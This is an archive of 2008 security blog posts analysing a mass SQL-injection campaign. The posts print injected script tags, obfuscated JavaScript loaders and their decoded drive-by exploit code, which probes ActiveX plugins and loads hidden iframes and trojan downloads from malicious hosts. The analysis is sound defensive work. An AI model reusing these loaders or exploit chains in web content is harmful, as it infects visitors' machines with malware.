Archive for May, 2008

http://%6b%6b%36%2e%75%73/1.js

Posted in Uncategorized on May 30, 2008 by s3cu

another domain being used now is http://%6b%6b%36%2e%75%73/1.js
decoded it goes to http://kk6.us/1.js

Advertisements

cmiia.com/op1.js

Posted in Uncategorized on May 29, 2008 by s3cu

Just discovered a very different SQL injection from the past mass attacks.
The injected tag is of this form
<script src=”http://cmiia.com/op1.js”=%5Bsome random URLs]>[some associated word with URL]</script>
For example –
<script src=”http://cmiia.com/op1.js”=http://groups.msn.com/BestHomeEquityLineOfCredit/>home equity line of credit</script>

The op1.js is as follows:
var ptitle = document.title;
var atpos = ptitle.indexOf(“-“);
if (atpos > -1) {
ptitle = ptitle.substring(atpos+2, ptitle.length);
}

var tt; var kk; var mm; kk=””; tt=”w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;”;

for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm==”(“) mm=”h”; if (mm==”*”) mm=”p”; if (mm==”!”) mm=”/”; if (mm==”>”) mm=”e”;if (mm==”$”) mm=”.”;
if (mm==”[“) mm=”t”; if (mm==”#”) mm=”a”; if (mm==”^”) mm=”o”; if (mm==”]”) mm=”?”; if (mm==”@”) mm=”k”;
if (mm==”{“) mm=”&”; if (mm==”)”) mm=”:”; if (mm==”;”) mm=”=”; if (mm==”|”) mm=”i”; if (mm==” “) mm=”+”; kk=kk+mm; }
kk += ptitle + “‘;”;
eval (kk);

The op1.js is decoded to be
window.location=’http://bandateam.com/in.cgi?4&parameter=document.title&#8217;;

The above URL was redirected to the following URL when retrieved
http://antivirus-scanonline.com/1/?xx=1&in=2&h=1&ag=2&end=1&g=1&aid=dogma&affid=182

Looks like it is one of those fakealert site typically associated with RBN.

chanm.cn/a.js

Posted in Uncategorized on May 28, 2008 by s3cu

another sql injected domain discovered http://chanm.cn/a.js

other than 51yes.com counter iframe, the following iframe was embedded in a.js
<iframe src=http://www.gogo111.net/dl6.htm?Seraph width=0 height=0></iframe>
which embeds another iframe
<iframe src=news.html width=100 height=0></iframe>

Content of news.html


<script>window.onerror=function(){return true;}</script>
<script>
/*Extreme*/
window.defaultStatus="Íê³É";
Status="utf8to16";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="sAtgCETjDKdrrmaiXqvI7tTKiFIOsgcbcUpm1dkOaZR22G5+cj8cif2A+Zq3whGm0R7QYaR+ogu3hj/Olmu3xVGHDz+5nA2j5rYC57a2xAuGwS7Tl7JEl7Wh0xdiLewn8honX58z4/5uoctMfB7tMi6E66Bvg8nT7E9Uf+e5qh5JVBqSDnohjuA1rdErKNe69mpeB+ws5vvN4N978ocMwKcm+5hwNn+3DccvROMEXF/YYZZ0nXqoYVJWlE1PwCegqIspBIe1uQVoDk134T5UaSr7bfWDZHZUzjX4bq/XPvp0Ub6vyC57J+dUI//2dBA4VUIpGmc+Mptanv8PoqXOhVSHafbiqNOwFzp5R7YRS1w0NV5hhe0tM+fVr8JloxFLQL29hNL/bHb6ENGJptE8fgdzvIb88ONM3f7hBkfVC20MlB1JTWdWemT5FNH1GavfLEofMbVDQp8nxOEm9XanZQ2f/pWM+5YYf74Brc3HMki+l/UXyWHxyBbKl5SxHUanh91DUxC0ZTGROerW9x/hLt75jjPUY9VFa4UipXYlbtmnQVmFQVvmxKYyFss339HrqeFcAB89+aIkHlm9VgyG7RNbh6PR0HdRB2tVnLm11XA6QWo3j8+AHX7c21Ay1XWOkFdjpHQfA9p/DcRFwwSCkZc53+9htnv9BhzJi6vFuMYkKbQicYaZ8ihvSO1KIKedmbb24s3V3I0kT1j6JxuUrIShJH83WrqYzdV3zI3nRC4LFVIeAtGxXNxTkgwY0q6GTnZd86pMN9z8z03XV5UvbGLMpW1yG/nkigNH7jTvWYTvzSQ1GgfuO/8tWQ2wujJeEkSJd1VFv9N2AQjQjCtX34JYy3meKxhUo8jbvymYNZ1VRt1855tJDOsEeuAgaYKuPYq7jDkUfrLUZG3NYxQZF0CiYpKAGrr6+czLjWEqmqyeqf6hbITYkxQF42tSDSiUfKqc8QmVjH6rb8wSLpCVR4sGIvdYT/rpWANsLWds15oPT49ctCz+eP0JJgxaMOLi3KOeBzaydaDBff5o4EmhfHnwe2PUqTNfYDZffLO0nd6BDzErm7j2VStvKnx3WFQN26QLyQegqNEI4Bp9l8jh/ZtJMGkcr1eqq+/vjRgAt6y0AzIbnM2TCq+o8TLujN5VIXPJy/Tee5DhdODS7kvPSf5qWt08aVMUerxCFfAEO5HajJrUuAExrL+sZaGildMzV44gvi6UaJugcMGv9Gm6OsX6vglY8zz0I35fquC2VmNf2CoGJd8OhxQN15fpBURLIdENBDZ8idebXuVp1yRRP7KEb3a+MOrIzAPfrOB3Ur/kLWCScFjuMWqncrkAcHXVkf1TLvgPJ/tBb1acbfCL+uP0ukjNPOvXzUTMJY4uyff1XfUlMBY7Sg4h0KMWha/Xinqz6gFGEDylthfggBbpKmKIxlUeYWawQ7C1Ia8wGWFYjZoidOG7N8njyLfF2e4yvgFEyDF/5emrUSeEv9KbqQb/QjM62fLvbm8B6xXYWSsFD1SJq7Bsu76Fz09glIg3MgU/9An0RfUvbkfiJd6ALnUSFKVhgJcQnRm+miE1cMnml46azsUHlUtqr+yXrISG3iuo7aXP53be143AaSV0k4JdxUQOuyhcmqQz6N1A+fgk5D7t7HI5zyFwriqp+Ok2h1Z6KsA5HDy2meqQPUuS9yr9Sqy0W3GsbsnngcK0l+pcLHxHW7W6zrTLf5DXf8MrvhJ2j68aKfiooHT3Lallujp2GmOttCrezC7fB2bdxhseCvY5sscmX8GHdwIz/fqiyxiG9+Butvd+DUjs0P+NELwMZK1X3QeEnClu9tn3pBVQ6WHHyMxQAmWN+LMq8bNcUzcBSkdyia9pREn/KzRdjF3nsbSvi87iekefIOAqrqxx6IcyySARchgW0lzNZwAfGxVrBShFHg1e0YeDBNnE7vJJ5NAX6YyDnWflmo6d0VHZXOG7/JugtbISbW6czqlQadyO8VU+KuZOpl8pXKuetjKh70LORBsQo+4PVfujxzGiYve8pM3ltp5VmAeosjOEL6hh+Zke31qNtGz15xvqrQ0ocBpGKHJN2FSkdhXNbYVDkA1jM8TOwPyhCD1fCmqVXODzsYMwXW5ysAS++XRZjyaZsBUvPEwz9Zj2A5iLkXEd5uo+K2EgcQxiMVAzOgSYe80QcPMSCUbEwVX0zo3P8st5HkdmNjrad8n0YXt8eyKbhrj5UCc6Fm1nNXGrh6kjuAlgU5+g6oNY3RZ7gHPqY3O8obwmATgPxz1h4QCQRzCq8qHu4zX/qZRYeStyurpEL8nZ0UCkatwLXwK7hGvxdqEwBS1L9i5Ih/hRfgmfmw14fG2dQuuNx7KmlAZJ5LW2H+b1/T1nEvbQurUmmJ8JYjbgTT155I51TbgNeAhK9IocFoowa1FLxYxpS1WQi5QytETgslr8OEgs0QzOH9+rQS//LKkIIj/geDyx7uMDRBugw29+cvEIXVvIh1D/kdtszrLnGBGsGH9YZZTrBh7/5u0zGbjXGEufFyPHSGGyy3eCWttMak6I6t0Z4ypBECckGbAOQnzQmLfuEvGMbES4b0C/2ZG2qS0r/UZGnc6H8qhcwEVRPUhZD9MeKO3AiF8SpJLCQCht8lNs/OLkHIAbdNElKNFbpjpTXisR3KvwPoVoaZJN8S+lhx3tvxPijvqSkkrrMqOg/51V2eS6gswV6Vg8Ol/q73wh00ze4CSkQWMlwhzUefLPrLjENpuCqqnf9tXNZF9hXOVbl3OAIYBL64r6xpXpLH9uzjnYtwLCADMAFISIIm2Dn2XDj7/bEy3q0jroIs2RuAr+RFgJTE+yYAXQrsmbZzqUsZypYllJ1NhcLXGjiEUFBnEVy94os8AdPcvOZOkATjLSVu/r802U7fID+gb9oPYj+pGovdk3+Tx4OLnlzdiGRqj6sZHxf1CsftOPgG8x13N3k5hxkaWKq6y6dblSzEy7pzEgibmdheoYQFgc6AxgPXeLye8vAt5+MHyngEdxEGbVonZ8haHx2FJpgIAul3qmab3vrajNIrghP3hUG9BOs9YRdCOu6cemrul2Xti2uXTz4GO9TtYVGw5THbbn5joUH8syzQAHJMpRLCAA";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0=4(5(3(0),\'\\2\\1\\6\\d\\7\'));c["\\b\\a\\8\\9"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
/*Extreme*/
</script>

The above obfuscated JS can be decoded as

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.isee080.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9");}
catch(f){};
finally{if(f!="[object Error]"){
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain">');
document.write('<param name="movie" value="http://www.guccime.net/4561.swf">');
document.write('<param name="quality" value="high">');
document.write('<param name="bgcolor" value="#ffffff">');
document.write('<embed src="http://www.guccime.net/4561.swf">');
document.write('</object>');
}else{document.write("<EMBED src=http://www.guccime.net/4562.swf width=0 height=0>")}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.isee080.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.isee080.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.isee080.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.isee080.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.isee080.net/Thunder.html></iframe>')}catch(e){}
}}}

From the decoded js, it can be seen what applications it tries to exploit.

ms06014.js – downloads trojan from http://user1.12-26.net/bak.css which in turn downloads more trojans from http://softa.softkills.net/soft%5B0-36%5D.exe

Contents of http://%66%75%63%6B%75%75%2E%75%73/1.js

Posted in Uncategorized on May 26, 2008 by s3cu

The downloaded javascript file is as follows:


document.writeln("<base onmouseover=\"window.status=\'Íê±Ï \';return true\">");
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie101ab2="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie101ab2=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://d.sorryl.biz/xx/am7.htm?999\" width=1 height=1><\/IFRAME>");
document.write("<div style=\"display:none\">");
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/642888\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/642888\/ystat.gif\"\/><\/a><\/noscript>");
}
}Get();

Other than the counters, the interesting part comes from the IFrame http://d.sorryl.biz/xx/am7.htm?999
I suspect the domain changes periodically.
Anyway, so what is “am7.htm?999” ? More javascript that exploits several vulnerabilities


<iframe src="http://d.sorryl.biz/ax14.htm" width=100 height=0></iframe>
<iframe src="http://d.sorryl.biz/re10.htm" width=100 height=0></iframe>
<iframe src="http://www.tongji123.org/axfs.htm" width=100 height=0></iframe>
<script>
var kaspersky="shabi"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://d.sorryl.biz/axlz.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://d.sorryl.biz/re11.htm"></iframe>');}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1898633.js"></script>

mass mssql injection attack

Posted in Uncategorized on May 26, 2008 by s3cu

There are many news and articles written about the waves of sql injection.
A good list of domains injected can be found at shadowserver.

newer domains injected include: